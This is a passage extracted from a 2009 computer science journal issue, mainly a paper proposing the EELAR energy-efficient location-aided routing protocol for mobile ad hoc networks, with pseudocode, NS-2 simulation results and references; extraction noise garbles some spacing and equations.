extraction technique and instead of using global input, we may
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
57 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 64/215
use the feature input along with other neural network
classifier.
REFERENCES
[1] Verma B.K, “Handwritten Hindi Character Recognition
Using Multilayer Perceptron and Radial Basis Function Neural Network”, IEEE International Conference on Neural
Network, vol.4, pp. 2111-2115, 1995.
[2] Sutha.J, Ramraj.N, “ Neural Network Based Offline Tamil
Handwritten Character Recognition System”, IEEEInternational Conference on Computational Intelligence and
Multimedia Application,2007 Volume 2,13-
15,Dec.2007,Page(s):446-450,2007.
[3] A. Rajawelu, M.T. Husilvi, and M.V.Shirvakar, "A
neural network approach to character recognition." IESEE
Trans. on Neural Networks, vol. 2, pp. 307-393, 1989,
[4] W.K . Verma, "New training methods for multilayer
perceptrons," Ph.D Dissertation, Warsaw Univ. of Technology, Warsaw, March 1995.
[5] B. Parhami and M. Taragghi, "Automatic recognition of
printed Farsi text," Pattern Recognition, no. 8, pp. 787-1308,
1990.
[6] C.C. Tappert, C.J. Suen and T. Wakahara,"The state of
the art in outline handwriting recognition," IEEE Trans. on
Pattern Analysis and Machine Intelligence, vol.PAMI-12,
no.8, pp.707-808, 1990.
[7] D.S. Yeung, "A neural network recognition system for handwritten Chinese character using structure approach,"
Proceeding of the World Congress on Computational
Intelligence, vo1.7, pp. 4353-4358, Orlando, USA, June 1994.
[8] D.Y. Lee, "Handwritten digit recognition using K nearest-neighbor, radial basis function and backpropagation neural
networks," Neural computation, vol. 3, 440- 449.
[9] E. Cohen, 1.1. Hull and S.N. Shrikari, "Control structurefor interpreting handwritten addresses," IEEE Trans. on
Pattern Analysis and Machine Intelligence,
vol. 16, no. 10, pp. 1049-1055, Oct. 1994.
[10] H. Almualim and S . Yamaguchi, "A method for
recognition of Arabic cursive handwriting," IEEE Trans. onPattern and Machine Intelligence, vol. PAMI-9, no 5, pp.715-
722, Sept. 1987.
[11] I.S.I. Abuhaiba and S.A. Mahmoud, "Recognition of
handwritten cursive Arabic characters," PA&MI vol.16, no6, pp. 664-
672, June 1994.
[12] J. Hertz, A. Krogh and R. Palmer, "Introduction to the
theory of neural computation," Addison-Wesley PublishingCompany, USA, 1991.
[13] K. Yamada and H. Kami, "Handwritten numeralrecognition by multilayered neural network with
improved learning algorithm," IJCNN Washington DC,
vol. 2, pp. 259-266, 1989.
[14] P. Morasso, "Neural models of cursive script
handwriting," IJCNN, WA, vol. 2, pp. 539-542, June 1989.
[15] S.J. Smith and M.O. Baurgoin, "Handwritten character
classification using nearest neighbor in large database," IEEE
Trans. on Pattem and Machine Intelligence, vol. 16, no 10, pp.
915-919, Oct. 1994
[16]. Neural Computing Theory and Practices by
Philip D. Wasserman.
[17]. Neural Networks, Fuzzy Logic, and Genetic Algorithms
by S. Rajasekaran and G.A. Vijaylakshmi Pai.
(IJCSIS) International Journal of Computer Science and Information Security,
Vol. 4, No. 1 & 2, 2009
58 ISSN 1947 5500
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 65/215
Energy Efficient Location Aided Routing Protocol for Wireless MANETs Mohammad A. Mikki
Computer Engineering Department IUG
Gaza, Palestinemmikki@iugaza.edu.ps
Abstract — A Mobile Ad-Hoc Network (MANET) is a collection
of wireless mobile nodes forming a temporary network without
using any centralized access point, infrastructure, or
centralized administration.
In this paper we introduce an Energy Efficient Location Aided
Routing (EELAR) Protocol for MANETs that is based on the
Location Aided Routing (LAR). EELAR makes significant
reduction in the energy consumption of the mobile nodes
batteries by limiting the area of discovering a new route to a
smaller zone. Thus, control packets overhead is significantly
reduced. In EELAR a reference wireless base station is used
and the network's circular area centered at the base station is
divided into six equal sub-areas. At route discovery instead of
flooding control packets to the whole network area, they are
flooded to only the sub-area of the destination mobile node. The
base station stores locations of the mobile nodes in a position
table. To show the efficiency of the proposed protocol we
present simulations using NS-2. Simulation results show that
EELAR protocol makes an improvement in control packet
overhead and delivery ratio compared to AODV, LAR, and
DSR protocols.
Keywords: Location Aided Routing, MANET, mobile nodes, route
discovery, control packet overhead
I. I NTRODUCTION
A mobile ad hoc network (MANET) consists of a groupof mobile nodes (MNs) that communicate with each other without the presence of infrastructure. MANETs are used indisaster recovery, rescue operations, military communicationand many other applications. In order to providecommunication throughout the network, the mobile nodes
must cooperate to handle network functions, such as packetrouting. The wireless mobile hosts communicate in a multi-hop fashion. In multi-hop wireless ad-hoc networks,designing energy-efficient routing protocols is critical sincenodes have very limited energy, computing power and
communication capabilities. For such protocols to scale tolarger ad-hoc networks, localized algorithms need to be
proposed that completely depend on local information. Thekey design challenge is to derive the required global properties based on these localized algorithms.
In ad hoc networks, the routing protocols are divided into
three categories: Proactive, Reactive and Hybrid. InProactive routing protocols, each MN maintains a routingtable where control packets are broadcasted periodicallywithin the whole network. This means that the routes todestination MNs are computed at a regular time before
establishing the connection from source to destination.When a source MN wants to send data to a destination MN,it searches the routing table to find a destination MN match.The advantage of such a method is that the route is alreadyknown. But the disadvantage is that the control packets
overhead is large since they are sent periodically to maintainall routes although not all routes will be necessarily used.Thus, the limited network bandwidth is consumed by controloverhead. An example of proactive routing protocol is
DSDV [9].
In Reactive routing protocols, the routes are discoveredonly when the source MN needs to transmit data packets.Thus, the control packets are broadcasted just when there aredata to be transmitted. So, the broadcast overhead isreduced. In these protocols, there are two phases to establishroutes to destination. These two phases are route discovery
and route maintenance. Since the nature of the ad hocnetwork is highly mobile, the topology of the network ischanged often. When the route to destination is broken, theroute maintenance phase is started to keep route available.This method suffers from large end to end delay to haveroute available before sending data packets in large
networks. An example of reactive routing protocol is DSR [5].
Hybrid routing protocols include the advantages of both proactive and reactive protocols. Each MN defines two
zones: the inside zone and the outside zone. Each nodemaintains a neighbor table with n MN hops. These MNs areconsidered to be in the inside zone of the node. Thus, thehybrid protocols act as proactive protocols in the inside zoneand reactive protocols in the outside zone. Each node periodically broadcasts control packets in the inside zone to build a routing table for all MNs in the inside zone. When a
node wishes to send data to a destination node that resides in
the outside zone, it uses a reactive protocol. Thus, a routediscovery phase is invoked to establish the route to thedestination MN. An example of Hybrid routing protocols isZRP [14].
When the routing protocol does not use the locationinformation of the mobile node, then the routing is topology- based routing protocol. If the position information is used inthe routing protocol, then the routing is position-basedrouting protocol [15], [16]. There are two methods of
forwarding data packets in position-based routing: greedy
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 66/215
forwarding and directional flooding [23]. In greedyforwarding, the next hop node is the closest in distance to
destination. Greedy Perimeter Stateless Routing Protocol(GPSR) uses the greedy forwarding [6]. In the directionalflooding [19], the source node floods data packets in ageographical area towards the direction of the destinationnode. Location Aided Routing (LAR) uses directionalforwarding flooding [1], [19].
In the position-based routing protocols, an MN uses adirectional antenna or GPS system to estimate its (x, y) position. If GPS is used, every node knows it's (x, y)
position assuming z = 0. Fig. 1 shows two mobile nodeswith their positions determined using GPS. The positions of
the two mobile nodes in Fig. 1 are (x1, y1) and (x2, y2)respectively. Using Fig. 1, the distance d between the twoMNs is calculated using (1). The angle θ is defined as shownin Fig. 1 and is calculated using (2).
21 2 1 (1)
tan
(2)
When directional antennas are used, the distance between
two MNs and Angle of Arrival (AoA) are estimated accordingto the directional arrival. The strength of the signal is used toestimate the distance between two nodes and the estimate of θ is obtained from the Angle of Arrival (AoA) [12], [13].
The rest of the paper is organized as follows: Section II
presents related work. Section III presents EELAR approach.Section IV validates the proposed approach. Finally, section V
concludes the paper.
II. R ELATED WORK
In this section we present some of the most importantrouting protocols used in wireless mobile ad hoc networks.
Figure 1. Position-based routing protocol that uses GPS to determine mobile
nodes (x,y) positions
The Dynamic Source Routing (DSR) protocol is a simpleand efficient routing protocol designed specifically for use in
multi-hop wireless ad hoc networks of mobile nodes. DSR allows the network to be completely self-organizing andself-configuring, without the need for any existing network infrastructure or administration. The protocol is composed of the two mechanisms: route discovery and route maintenance,which work together to allow nodes to discover and
maintain source routes to arbitrary destinations in the ad hocnetwork [5]. The DSR protocol is triggered by a packetgenerated at the sending node for a destination node whoseIP address is (or can be) known to the sending node. Whena node has a packet to send to a destination it first checks itscache if a path to the destination is already known. If the
path is not available then the route discovery mechanism isinitiated. Route Discovery allows any host in the ad hocnetwork to dynamically discover a route to any other host inthe ad hoc network. The Route Maintenance proceduremonitors the operation of the routes and informs the sender of any routing errors. Route maintenance is required by all
routing protocols, especially the ones for MANETs due tovery high probability of routes being lost [11]. The use of
source routing allows packet routing to be trivially loop-free,avoids the need for up-to-date routing information in theintermediate nodes through which packets are forwarded,and allows nodes forwarding or overhearing packets tocache the routing information in them for their own futureuse. All aspects of the protocol operate entirely on-demand,
allowing the routing packet overhead of DSR to scaleautomatically to only that needed to react to changes in theroutes currently in use [17].
The Multipoint Relays (MPR) technique efficientlyfulfills the flooding function in wireless networks. It is a
technique to reduce the number of redundant re-transmissionwhile diffusing a flooding packet throughout the entirenetwork. Each node N in the network selects some neighborsas its Multipoint Relays (MPR). Only these neighbors will
retransmit the flooding packets broadcasted by node N.These nodes called 2-hop neighbors whose distance to N is 2
hops. The MPR selection algorithm should guarantee thatthe flooding packets from N will be received by all its 2-hopneighbors after re-broadcast of N's MPRs.
Location-Aided Routing (LAR) protocol is an approachthat decreases overhead of route discovery by utilizing
location information of mobile hosts. Such location
information may be obtained using the global positioningsystem (GPS) [1], [6], [7], [8], [19]. LAR uses two floodingregions, the forwarded region and the expected region. LAR
protocol uses location information to reduce the search spacefor a desired route. Limiting the search space results in fewer
route discovery messages [1], [19]. When a source node wantsto send data packets to a destination, the source node firstshould get the position of the destination mobile node bycontacting a location service which is responsible of mobilenodes positions. This causes a connection and tracking problems [8], [10]. Two different LAR algorithms have been
2 1 2 1
▲ Mobile node
(x1,y1) ▲
▲ (x2,y2)
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 67/215
presented in [19]: LAR scheme 1 and LAR scheme 2. LAR scheme 1 uses expected location of the destination (so-called
expected zone) at the time of route discovery in order todetermine the request zone. The request zone used in LAR scheme 1 is the smallest rectangle including current locationof the source and the expected zone for the destination. Thesides of the rectangular request zone are parallel to the X andY axes. When a source needs a route discovery phase for a
destination, it includes the four corners of the request zonewith the route request message transmitted. Any intermediatenodes receiving the route request then make a decisionwhether to forward it or not, by using this explicitly specifiedrequest zone. Note that the request zone in the basic LAR scheme 1 is not modified by any intermediate nodes. On the
other hand, LAR scheme 2 uses distance from the previouslocation of the destination as a parameter for defining therequest zone. Thus, any intermediate node J receiving theroute request forwards it if J is closer to or not much farther from the destination's previous location than node Itransmitting the request packet to J. Therefore, the implicit
request zone of LAR scheme 2 becomes adapted as the routerequest packet is propagated to various nodes.
AODV [22] protocol is a distance vector routing protocolthat operates on-demand. There are no periodic routing tableexchanges. Routes are only set up when a node wants to
communicate with some other node. Only nodes that lie on the path between the two end nodes keep information about the
route. When a node wishes to communicate with a destinationnode for which it has no routing information, it initiates routediscovery. The aim of route discovery is to set up a bidirectional route from the source to the destination. Route
discovery works by flooding the network with route request(RREQ) packets. Each node that receives the RREQ looks in
its routing table to see if it is the destination or if it has a freshenough route to the destination. If it does, it sends a unicastroute reply (RREP) message back to the source, otherwise itrebroadcasts the RREQ. The RREP is routed back on a
temporary reverse route that was created by the RREQ. Eachnode keeps track of its local connectivity, i.e., its neighbors.
This is performed either by using periodic exchange of HELLO messages, or by using feedback from the link layer upon unsuccessful transmission. If a route in the ad hocnetwork is broken then some node along this route will detectthat the next hop router is unreachable based on its localconnectivity management. If this node has any active
neighbors that depend on the broken link, it will propagate
route error (RERR) messages to all of them. A node thatreceives a RERR will do the same check and if necessary propagate the RERR further in order to inform all nodesconcerned.
III. ENERGY EFFICIENT LOCATION AIDEDROUTING PROTOCOL APPROACH
This section presents our proposed Energy Efficient
Location Aided Routing (EELAR) protocol approach. The proposed protocol is a modification to the ad hoc routing protocol LAR [1], [19]. EELAR utilizes location information
of mobile nodes with the goal of decreasing routing-relatedoverhead in mobile and ad hoc networks. It uses locationinformation of the mobile nodes to limit the search for a newroute to a smaller area of the ad hoc network which results ina significant reduction in the number of routing messages andtherefore the energy consumption of the mobile nodes batteries is decreased significantly. In order to reduce thecontrol overhead due to broadcast storm in the network when
control packets are flooded into whole network (as in DSR protocol for example) EELAR uses a wireless base station(BS) that covers all MNs in the network. BS divides thenetwork into six areas as shown in Fig. 2.
In order for BS to efficiently route packets among MNs,
it keeps a Position Table (PT) that stores locations of allMNs. PT is built by BS through broadcasting smallBEACON packets to all MNs in the network. MNs local positions are estimated from directional antennas, the
distance between the MN and BS is estimated using thestrength of the signal from MN to BS, and the angle of
arrival (AoA); θ (which is the angle of the mobile node from
which the packet arrives to BS) is estimated usingdirectional antenna of the MN. Based on the AoA, BS candetermine the network area in which each MN is located.
Table I shows how θ decides the area ID of each MN.
When a source MN needs to transmit data, it first queries BSabout the area id of the destination MN, then data packetsare flooded into that area only. The use of locationinformation of the destination mobile node limits the search
for a new route to one of the six areas of the ad hoc network.
Figure 2. The definition of the six areas in EELAR
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 68/215
TABLE I. THE DEFINITION OF THE SIX NETWORK AREAS IN EELAR BASED ON Θ
Area ID Range of angle θ
1 0 ≤ θ < π/3
2 π/3 ≤ θ < 2π/3
3 2π/3 ≤ θ < π
4 π ≤ θ < 4π/3
5 4π/3 ≤ θ < 5π/36 5π/3 ≤ θ < 2π
Fig. 3 shows the pseudo code of EELAR. As Fig. 3shows, the algorithm is multithreaded. First, it creates athread that executes BuildUpdatePositionTable which buildsand updates the PT in BS. Then, EELAR executes an infiniteloop. In this loop, whenever a new mobile node enters the
network area of BS then BuildUpdatePositionTable procedure is called so that the new mobile node will reportits position to BS and hence, its position is included in thePT in BS. When a source mobile node S wants to send data packets to a destination mobile node D, EELAR creates a
new thread that executes DataTransmission procedure.Multiple pairs of mobile nodes could communicate in parallel using parallel threads.
Fig. 4 shows the pseudo code of
BuildUpdatePositionTable procedure. As Fig. 4 shows,BuildUpdatePositionTable procedure starts by handling the
case when a mobile node A enters the network range of BS.A uses its location estimation method to determine its (x, y) position. A sends a broadcast message (PosReq message)that contains its position. PosReq message is a request to join the network of BS. PosReq contains the location of A.When BS receives this message it updates its PT. BS
determines A's angle θ; distance d between A and BS; andclassifies A as belonging to one of the six network areas.
Then, BS replies with ID Reply message (IDRp message) toA that contains the area ID of A, hence A knows its area ID.Then, BuildUpdatePositionTable continues where BS periodically broadcasts BEACON packets to all MNs in the
network in order to build PT that contains the network areaID of each MN that resides within the transmission range of
BS. This scenario is repeated between BS and all MNs periodically as long as the mobile nodes are still in thisnetwork. When a mobile node stops sending the broadcast packet (PosReq) then it is marked unreachable by BS after a
timer T expires.
Fig. 5 shows the pseudo code of DataTransmission procedure. DataTransmission procedure is called by EELAR when a source mobile node S sends data packets to adestination mobile node D. As Fig. 5 shows, first, S requests
from BS to initiate a route discovery to node D by sending aDstPosReq (destination position request) packet to BS that
requests the position information of D. BS checks if the position of D in PT is out of date, if so BS sends a smallBEACON message to node D requesting its new locationinformation to avoid out of date location information and
updates its PT. Then, BS searches its position table for the
area ID of D. When BS determines the area ID of D, it sends back DstIDRp (Destination ID Reply) packet to S containing
the network area ID of D. If the BS determines that S and Dare not in the same area then BS sends a control packet to Sindicating that the data flow will be through BS, so each data packet from S to D will contain a "toBS" flag in the header forcing all nodes in S's area to drop these packets and not tohandle them. Then, BS forwards data packets from node S to
the area where D belongs only. When the source node Swants to transmit data to node D and BS determined that S
and D are in the same network area, then BS will reply witha packet which indicates that the data flow will be donewithin the network area of node S and not through BS. Thisfrees BS from being involved in the communication between
S and D and BS will not be a performance bottleneck. Thennode S floods its own area with data packets that are
directed to D. If node B (which is in the same area as nodeS) receives a data packet directed to D and originating fromS (B may receive this packet from any node in same area of S) then it measures the distance between itself and D andcompares it with the distance between S and D. If B'sdistance is less than the S's distance then B will forward the
packet. Otherwise, it will drop it.
algorithm EELAR ( ) {Thread (BuildUpdatePositionTable); // create a thread// that executes BuildUpdatePositionTable procedurewhile (1) {
if ( a mobile node enters network area of the
base station)Thread (BuildUpdatePositionTable)
if (source mobile node wants to send datato a destination mobile node)Thread (DataTransmission); // create a thread that
// executes DataTransmission procedure} // end while
} // end EELAR
Figure 3. EELAR pseudo code
procedure BuildUpdatePositionTable ( ) // build and// update position table in BS
Input: mobile node A; base station X; {Control packet PosReq; // position request// message containing x, y coordinatesif (node A enters network area controlled by X){
A sends PosReq to X;
X: addPositionTable ( A, x,y);
X: sends IDRp to A containing area ID of A;}//end if Repeat every time T
X sends BEACON message to A;A sends PosReq to X;
X: UpdatePositionTable (A, x, y );until valid timer expiresX marks node A unreachable
} // end BuildUpdatePositionTable
Figure 4. BuildUpdatePositionTable pseudo code
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 69/215
procedure DataTransmission ( ) // a source mobile node// S sends data to destination mobile node DInput: Source node S, destination node D,
base station X;{
// S initiates data transmission to D// S requests X to initiate routing discoveryS sends DstPosReq to BS;
X checks PT for position of D;if (position of D in PT is out of date){
X sends BEACON message to D;D sends PosReq to X;X: UpdatePositionTable (A, x, y );
} // end if X searches PT for position of D;
X sends DstIDRp to S; // message contains// area ID of D
if (isNotIntheSameArea (S, D) ) {S sets toBS flag in header of all packets to D;// nodes in same area as S will drop the packetS sends data to X;X routes data to D; // BS floods message to// area of D
} // end if else {
// S floods message to its own areaS sends data to same area nodesfor each node B in S's area network {
if (distance (B,D) < distance (S, D) ) {
B forwards this packet;else
B drops this packet;} // end for
} //end else} // end procedure
Figure 5. DataTransmission pseudo code
The benefit DataTransmission procedure is to make theamount of data that can be transmitted and received at time t
more than the available bandwidth of BS through notinvolving BS with data transmission when this datatransmission is between nodes that are in the same area.
IV. EXPERIMENTAL R ESULTS
In order to validate the proposed protocol and show itsefficiency we present simulations using network simulator
version 2 (NS-2). NS-2 is a very popular network simulationtool. It uses C language for protocol definition and TCLscripting for building the simulation scenarios [21]. The
simulation environment settings used in the experiments areshown in Table II. The simulation duration is 500 secondsand the network area is 1500 meter x 1500 meter thatincludes variable number of mobile nodes ranging from 50to 250. A Constant Bit Rate (CBR) is generated as a datatraffic pattern at a rate of 2 packets per second, and 20% of
the mobile nodes are selected randomly as CBR sources.The scenario of nodes mobility is generated randomly based
on random way point model [20] where a mobile nodemoves to a new position and pauses there for time period between 0 to 3 seconds, then it move to another position.
TABLE II. NS2 simulation environment settings
Parameter Setting Value
Simulation duration 500 sec
Network area 1500 m x 1500 m
Number of mobile nodes 50,100,150,200,250
Mobility model Random way point model
Pause time 0 to 3 sec
Node transmission range 250 m
Data packet size 512 bytes
Number of CBR sources 20% of MNs
CBR rate 2 packets per second
Mobile node speed 5 to 30 m/s
We compare performance of EELAR with AODV, LAR,
and DSR which are well known routing protocols inMANETs. The measured performance metrics are control
overhead and the data packets delivery ratio. The controloverhead is the number of control packets divided by thenumber of delivered data packets in the network, and thedata packets delivery ratio is the number of received data
packets divided by the total number of sent data packets.
In the first experiment we measure the control overheadin the network of the four protocols as a function of theaverage speed of mobile nodes. The number of MNs in thenetwork was set to 100 and the average speed of MNs was
varied from 5 to 30 m/s. The result is shown in Fig. 6. As thefigure shows, for all compared protocols the overhead
increases slightly as the average speed of MNs increases. Inaddition, EELAR protocol has the smallest control overheadamong the four compared protocols. LAR has the secondsmallest control overhead, AODV has the third smallest
control overhead, and DSR has the worst control overhead.The justification for the small control overhead in EELAR
compared to the rest of protocols is that control packets usedin discovering a new route are limited to a smaller zone.
Figure 6. Control overhead versus average speed
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 70/215
In the second experiment we measure the delivery ratioof data packets for the four compared protocols as a function
of the average speed of mobile nodes. The number of MNsin the network was set to 100 and the average speed of MNswas varied from 5 to 30 m/s. The result is shown in Fig. 7.As the figure shows, for all compared protocols the datadelivery ratio decreases slightly as the average speed of MNs increases. In addition, EELAR protocol has the highest
delivery ratio of data packets among the four compared protocols. LAR has the second highest delivery ratio,AODV has the third highest delivery ratio, and DSR has theworst delivery ratio. As an explanation to the good deliveryratio in EELAR is that since control overhead is smaller (asshown in first experiment), the battery life of mobile nodes
is longer, and hence routes are maintained for longer time.One reason for loss of data packets is the loss of the routesdue to power shortage.
In the third experiment we measure the control overheadin the network of the four protocols as a function of the
number of mobile nodes. The average speed of MNs was set
to 15 m/s and the number of mobile nodes in the network was varied from 50 to 250 MNs. The result is shown in Fig.8. The simulation results show that for all compared protocols the control overhead in the network is increasedslightly as the node density of the network is increased. In
addition, EELAR protocol has the smallest control overheadamong the four compared protocols. LAR has the second
smallest control overhead, AODV has the third smallestcontrol overhead, and DSR has the worst control overhead.The justification of the improvement in control overhead inEELAR compared to the other three protocols is same as the
justification presented in the case of the first experiment.
In the fourth experiment we measure the delivery ratio of data packets in the network of the four protocols as afunction of the number of mobile nodes. . The average speedof MNs was set to 15 m/s and the number of mobile nodes in
the network was varied from 50 to 250 MNs. The result isshown in Fig. 9. As the figure shows, for LAR, AODV andDSR the data delivery ratio increases very slightly and for EELAR the data delivery ratio remains the same as thenumber of MNs increases. In addition, EELAR protocol hasthe highest delivery ratio of data packets among the four
compared protocols. Delivery ratio in EELAR never goes below 95%. LAR has the second highest delivery ratio,
AODV has the third highest delivery ratio, and DSR has the
worst delivery ratio. The justification of the improvement indelivery ratio in EELAR compared to the other three protocols is same as the justification presented in the case of
the third experiment.
Figure 7. Data packets delivery ratio versus average speed
Figure 8. Control overhead versus number of MNs in the network
Figure 9. Data packets delivery ratio versus number of MNs in the network
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 71/215
In the last experiment we determine the optimal number of network areas that the network should be divided into,
which produces the smallest control overhead. So we studythe effect of varying number of network areas on controloverhead in EELAR. Fig. 10 shows the result. In theexperiment number of network areas was varied from 1 to20, number of mobile nodes was set to 250 and the averagespeed was set to 15 m/s. As the figure shows the control
overhead keeps decreasing as the number of network areasincreases until this number reaches 6, then the controloverhead starts increasing as we keep increasing number of network areas. This is explained as follows. For the controloverhead decrease part: The idea of EELAR is to makesignificant reduction in control overhead by limiting the area
of discovering a new route to a smaller zone. Thus, controloverhead is reduced as number of areas increases. For thecontrol overhead increase part: Increasing number of areasincreases routes loss. When there is a very large number of areas and due to mobility of nodes, there is a higher probability that a node leaves its original area and enters a
new area very quickly during a short period of time. Hence,in the case of larger number of areas when a source node
initiates a transmission to a destination node, the possibilityof lost routes during transmission period is higher than thatin the case of smaller number of area. This leads to increasedcontrol overhead. This increased control overhead becomesworse as the number of areas keeps increasing.
Thus, our approach of dividing the network area into sixsub-areas is not the optimal solution in all cases. There is atradeoff between decreasing control overhead by increasingnumber of areas and route loss by increasing the number of
network areas due to node mobility. This suggests thatoptimal number of network area is dependent on the nodes
mobility.
Figure 10. Control overhead in EELAR versus number of network areas
V. CONCLUSION
This paper proposed an Energy Efficient Location AidedRouting Protocol (EELAR) that is an optimization to theLocation Aided Routing (LAR). EELAR makes significantreduction in the energy consumption of the mobile nodes
batteries through limiting the area of discovering a newroute to a smaller zone. Thus, control packets overhead is
significantly reduced and the mobile nodes life time isincreased. To show the efficiency of the proposed protocolwe presented simulations using NS-2. Simulation resultsshow that our proposed EELAR protocol leads to an
improvement in control overhead and delivery ratiocompared to AODV, LAR, and DSR protocols.
In addition, simulation results show that there is atradeoff between decreasing control overhead by increasingnumber of areas and increasing route loss by increasing the
number of network areas due to node mobility. This suggeststhat optimal number of network area is dependent on thenodes mobility.
Suggestions for future work include developing a method toadaptively use one of the forwarding methods of the position-based routing protocol based on the surroundingenvironments, and dividing the network into a number of areas that varies dynamically based on the node mobility pattern.
ACKNOWLEDGMENT
The author wishes to acknowledge Mohamed B.AbuBaker, Shaaban A. Sahmoud and Mahmoud Alhabbashfrom the computer engineering department at IUG for their work, useful feedback, and comments during the preparation
of this paper.
R EFERENCES
[1] T. Camp, J. Boleng, B. Williams, L. Wilcox, and W. Navidi,"Performance comparision of two location- based routing protocols for ad hoc networks," in Proc. IEEE INFOCOM , 2002, p. 1678-1687.
[2] W. Zhao, and M. H. Ammar, "Message ferrying: proactive routing inhighly-partitioned wireless ad hoc networks," in Proc. Distributed Computing Systems, FTDCS 2003, 2003.
[3] N. Aslam, W. Robertson, S. C. Sivakumar, and W. Phillips, "Energyefficient cluster formation using multi criterion optimization for wirelesssensor networks," in Proc. 4th IEEE Consumer Communications and Networking Conference (CCNC), 2007.
[4] N. Aslam, W. Phillips, W. Robertson, and S. Sivakumar, "Extendingnetwork life by using mobile actors in cluster-based wireless sensor andactor networks," in Proc. Wireless Sensor and Actor Networks (WSAN
08), Ottawa, ON, 2008.[5] J. Broch, D. B. Johnson, and D. A. Maltz, "The dynamic source routing
protocol for mobile ad hoc networks," draft-IETF-manet-dsr-03.txt,Internet Draft, Oct. 1999.
[6] B. Karp, and H. T. Kung, “GPSR: Greedy perimeter stateless routing for wireless networks,” in Proc. IEEE/ACM MOBICOM , Boston, MA, Aug.2000. p. 243–254.
[7] J. Li, J. Jannotti, D. S. J. De Couto, D. R. Karger, and R. Morris, “Ascalable location service for geographic ad hoc routing,” in Proc. 6th Annual IEEE/ACM MOBICOM , Boston, MA, Aug. 2000, p. 120.
[8] W. KieS, H. FuSler, and J. Widmer, “Hierarchical location service for mobile ad hoc networks,” in Proc. ACM SIGMOBILE , vol. 8, no. 4, Oct.2004, p. 47-58.
(IJCSIS) International Journal of Computer Science and Information Security
Vol. 4, No. 1 & 2, 2009
8/14/2019 International Journal of computer science and Information Security
http://slidepdf.com/reader/full/international-journal-of-computer-science-and-information-security 72/215
[9] C. E. Perkins, and P. Bhagwat, “Highly dynamic Destination SequencedDistance-Vector Routing (DSDV) for mobile computers,” Comp.Commum. Rev., pp. 234-244, Oct. 1994.
[10] K. Akkaya, and M. Younis. "A survey on routing protocols for wirelesssensor networks. Ad Hoc Networks," 3(3), pp. 325–349, May 2005.
[11] C. Yu, B. Lee, and H. Youn, “Energy efficient routing protocols for mobile ad hoc networks,” Wireless Communications and MobileComputing , vol. 3, no. 8, pp. 959–973, 2003.
[12] A. Quintero, D. Li, and H. Castro, “A location routing protocol based on
smart antennas for ad hoc networks,” Journal of Network and Computer Applications, Elsevier, vol. 30, pp. 614–636, 2007.
[13] Dragos¸ Niculescu, and B. Nath, “Ad hoc Positioning System (APS)using AOA”, in Proc. IEEE INFOCOM , 2003.
[14] Z. Hass, and M. Pearlman, “The performance of query control schemesfor the zone routing protocol”, in Proc. ACM SIGCOMM , Aug. 1998.
[15] H. C. Liao, and C. J. Lin, “A WiMAX-based connectionless approachfor high mobility MANET”, in Proc. 9th International Conference on Advance Communication Technology (ICACT 2007), Phoenix Park,Korea, Feb. 2007.
[16] H. C. Liao, and C. J. Lin, “A Position-based connectionless routingalgorithm for MANET and WiMAX under high mobility and variousnode densities,” Information Technology Journal , 7 (3), pp 458-465,2008.
[17] D. Johnson, D. Maltz, and Y. Hu, "The dynamic source routing
protocol", IETF Internet draft, Jul. 2004.[18] Y. Zhao, L. Xu, and M. Shi, ”On-Demand Multicast Routing Protocol
with Multipoint Relay (ODMRP-MPR) in mobile ad-hoc network,” in Proc. ICCT2003, 2003, p. 1295-1300.
[19] Y. B. Ko, and N. H. Vaidya, "Location-Aided Routing (LAR) in mobilead hoc networks," in Proc. 4th annual ACM/IEEE international conference on Mobile computing and networking , 1998.
[20] W. Navidi and T. Camp, “Stationary distributions for the randomwaypoint mobility model,” IEEE Transactions on Mobile Computing ,3(1), 2004.
[21] "The Network Simulator ns-2," Information Sciences Institute, USAViterbi School of Engineering, Sep. 2004, Available:http://www.isi.edu/nsnam/ns/
[22] C. Perkins, E. Belding-Royer, and S. Das, “Ad hoc On-demand DistanceVector (AODV) routing,” University of Cincinnati, Internet draft, July
2003.[23] H. Okada, A. Takano, and K. Mase, “Analysis and proposal of position-
based routing protocols for vehicular ad hoc networks,” IEICE Transactions, 91-A(7), pp. 1634-1641, 2008.
AUTHORS PROFILE
Mohammad A. Mikki is an Associate Professor of Parallel and Distributed
Computing in the Electrical and Computer Engineering Department at IUGwith about fifteen years of research, teaching, and consulting experience in
various computer engineering disciplines. Dr. Mikki was the first chairman
of the ECE department at IUG in the academic year of 1995-1996. He taught both graduate and undergraduate courses at the ECE department at IUG. In
addition he taught several undergraduate courses at the College of Science
and Technology, College of Education (currently Al-Aqsa University) andAl-Quds Open University. He was a visiting Professor at the Department of
Electrical and Computer Engineering at University of Arizona in Tucson,
Arizona (USA) during the academic year of 1999-2000. He was grantedDAAD Study Visit Scholarship to Paderborn University in Paderborn in
Germany from July 2002 to August 2002 from DAAD (German Academic
Exchange Service). Dr. Mikki published about twenty publications in both
journals and international conferences.Dr. Mikki got both his Ph.D. and Master of Science in Computer Engineering
from Department of Electrical and Computer Engineering in Syracuse
University in Syracuse, New York, USA in December 1994 and May 1989respectively. He also got his Bachelor of Science in Electrical Engineering
